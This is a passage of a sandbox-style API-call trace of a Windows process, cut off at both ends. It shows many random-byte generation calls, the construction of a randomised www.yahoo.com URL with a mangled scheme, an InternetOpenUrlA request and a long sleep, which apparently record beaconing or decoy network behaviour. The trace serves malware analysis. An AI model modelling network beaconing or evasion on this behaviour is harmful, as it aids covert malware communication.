pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.337] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.337] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.337] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.337] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.338] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.338] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.338] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.338] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.338] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.338] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.338] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.338] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0255.338] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.338] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.338] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.339] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0255.339] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.339] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.339] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.339] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.339] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.339] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.339] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.339] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0255.339] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.339] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.340] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.340] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.340] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.340] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.340] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.340] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.340] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.340] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0255.340] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.340] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.340] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.340] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.341] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.341] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.341] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.341] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.341] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.341] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.341] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.341] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.342] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.342] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.342] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.342] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.342] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.342] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0255.342] GetProcessHeap () returned 0x440000 [0255.342] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x201) returned 0x472900 [0255.342] lstrcpyA (in: lpString1=0x472900, lpString2="¿\x07\x104s://www.yahoo.com" | out: lpString1="¿\x07\x104s://www.yahoo.com") returned="¿\x07\x104s://www.yahoo.com" [0255.342] lstrcatA (in: lpString1="¿\x07\x104s://www.yahoo.com", lpString2="/kdzqimhigYee6u2jn5jv3nxKnXw4ujcso42kpmpdXnsD/f1orviH3l1zeO5zK5dte/y7Dgdja1zHcjogwx6djpijJlexrG58/wjyxnohsrxs80a96kigu4yd8yb1yql/yu8ejer0ptmwvteli4cDxhiY3jiseh6rzvbpzigcSk4/" | out: lpString1="¿\x07\x104s://www.yahoo.com/kdzqimhigYee6u2jn5jv3nxKnXw4ujcso42kpmpdXnsD/f1orviH3l1zeO5zK5dte/y7Dgdja1zHcjogwx6djpijJlexrG58/wjyxnohsrxs80a96kigu4yd8yb1yql/yu8ejer0ptmwvteli4cDxhiY3jiseh6rzvbpzigcSk4/") returned="¿\x07\x104s://www.yahoo.com/kdzqimhigYee6u2jn5jv3nxKnXw4ujcso42kpmpdXnsD/f1orviH3l1zeO5zK5dte/y7Dgdja1zHcjogwx6djpijJlexrG58/wjyxnohsrxs80a96kigu4yd8yb1yql/yu8ejer0ptmwvteli4cDxhiY3jiseh6rzvbpzigcSk4/" [0255.342] GetProcAddress (hModule=0x7ffc51070000, lpProcName="InternetOpenUrlA") returned 0x7ffc5107e820 [0255.342] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="¿\x07\x104s://www.yahoo.com/kdzqimhigYee6u2jn5jv3nxKnXw4ujcso42kpmpdXnsD/f1orviH3l1zeO5zK5dte/y7Dgdja1zHcjogwx6djpijJlexrG58/wjyxnohsrxs80a96kigu4yd8yb1yql/yu8ejer0ptmwvteli4cDxhiY3jiseh6rzvbpzigcSk4/", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x20c00000, dwContext=0x0) returned 0x0 [0255.342] GetProcessHeap () returned 0x440000 [0255.342] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x472900 | out: hHeap=0x440000) returned 1 [0255.342] GetProcessHeap () returned 0x440000 [0255.342] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x3a02250 | out: hHeap=0x440000) returned 1 [0255.342] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="EnterCriticalSection") returned 0x7ffc5f83e600 [0255.343] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="LeaveCriticalSection") returned 0x7ffc5f83eb00 [0255.343] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.343] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe60, cbBuffer=0x4, dwFlags=0x2 | out: pbBuffer=0x46ffe60) returned 0x0 [0255.343] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="Sleep") returned 0x7ffc5eceb7b0 [0255.343] Sleep (dwMilliseconds=0x106bb) [0255.555] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.555] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffe90, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffe90) returned 0x0 [0255.555] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.555] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0255.555] GetProcessHeap () returned 0x440000 [0255.555] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xc6) returned 0x4d4900 [0255.556] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.556] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0255.556] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.556] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d4901, cbBuffer=0x30, dwFlags=0x2 | out: pbBuffer=0x4d4901) returned 0x0 [0255.556] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.556] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.556] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.556] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0255.557] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.558] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0255.558] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.558] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.558] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.558] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.558] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.558] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5e, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5e) returned 0x0 [0255.558] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.559] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0255.559] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.559] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0255.559] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.559] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.559] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.559] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0255.559] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.559] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.560] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.560] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.560] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.560] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.560] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.560] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0255.560] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.560] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.561] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.561] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.561] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.561] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.561] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.561] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.561] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.562] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.562] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.562] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.562] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.562] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0255.562] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.562] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.562] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.562] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.563] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.563] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0255.563] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.563] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.563] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.563] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0255.563] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.563] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0255.564] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.564] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.564] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.564] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0255.564] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.564] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0255.564] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.565] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.565] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.565] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.565] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.565] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.565] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.565] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.565] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.566] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.566] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.566] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffdc8, cbBuffer=0x8, dwFlags=0x2 | out: pbBuffer=0x46ffdc8) returned 0x0 [0255.566] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.566] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x4d4931, cbBuffer=0x25, dwFlags=0x2 | out: pbBuffer=0x4d4931) returned 0x0 [0255.566] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.566] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.566] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.567] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0255.567] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.567] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0255.567] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.567] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.567] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.567] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.567] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.567] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.568] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.568] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0255.568] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.568] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0255.568] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.568] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0255.568] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.568] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.569] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.569] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5d, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5d) returned 0x0 [0255.569] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.569] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.569] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.569] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.569] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.569] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.569] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.570] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.570] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.570] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.570] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.570] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x46ffd5f, cbBuffer=0x1, dwFlags=0x2 | out: pbBuffer=0x46ffd5f) returned 0x0 [0255.570] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptGenRandom") returned 0x7ffc5bcc36b0 [0255.570] BCryptGenRandom (in: hAlgorithm=0x0, 